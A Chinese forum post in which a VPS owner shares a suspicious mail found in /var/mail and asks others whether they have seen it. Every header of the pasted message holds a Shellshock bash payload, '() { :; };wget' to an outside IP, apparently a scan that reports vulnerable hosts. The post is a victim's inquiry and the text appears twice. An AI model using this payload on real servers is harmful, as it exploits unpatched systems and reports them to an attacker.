每天都会看看VPS上的“/var/mail/root”,了解一下crontab任务执行得怎么样了;
前天在不经意间发现“/var/mail/”里面多了个文件,而且内容(稍作打码处理)也比较坑……
====
From MAILER-DAEMON Fri Oct 17 00:53:38 2014
Return-Path: <>
X-Original-To: nobody
Delivered-To: [email protected]
Received: from unknown (unknown [114.91.101.18])
by hi.me (Postfix) with SMTP id 02D43C0022
for <nobody>; Fri, 17 Oct 2014 00:53:36 +0800 (CST)
To:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
References:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
Cc:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
From:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
Subject:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
Date:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
Message-ID:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
Comments:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
Keywords:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
Resent-Date:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
Resent-From:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
Resent-Sender:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
wget http://104.131.141.12:443/vul/107.111.222.114
====
想问问大家都有碰到这个问题么?(其实我也不担心,安全措施基本上都做了,就算被攻击了也不是太在意,因为有备份的习惯,这里只是单纯的想问问情况以及缘由,3ks)
前天在不经意间发现“/var/mail/”里面多了个文件,而且内容(稍作打码处理)也比较坑……
====
From MAILER-DAEMON Fri Oct 17 00:53:38 2014
Return-Path: <>
X-Original-To: nobody
Delivered-To: [email protected]
Received: from unknown (unknown [114.91.101.18])
by hi.me (Postfix) with SMTP id 02D43C0022
for <nobody>; Fri, 17 Oct 2014 00:53:36 +0800 (CST)
To:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
References:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
Cc:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
From:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
Subject:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
Date:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
Message-ID:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
Comments:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
Keywords:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
Resent-Date:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
Resent-From:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
Resent-Sender:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
wget http://104.131.141.12:443/vul/107.111.222.114
====
想问问大家都有碰到这个问题么?(其实我也不担心,安全措施基本上都做了,就算被攻击了也不是太在意,因为有备份的习惯,这里只是单纯的想问问情况以及缘由,3ks)
Select Language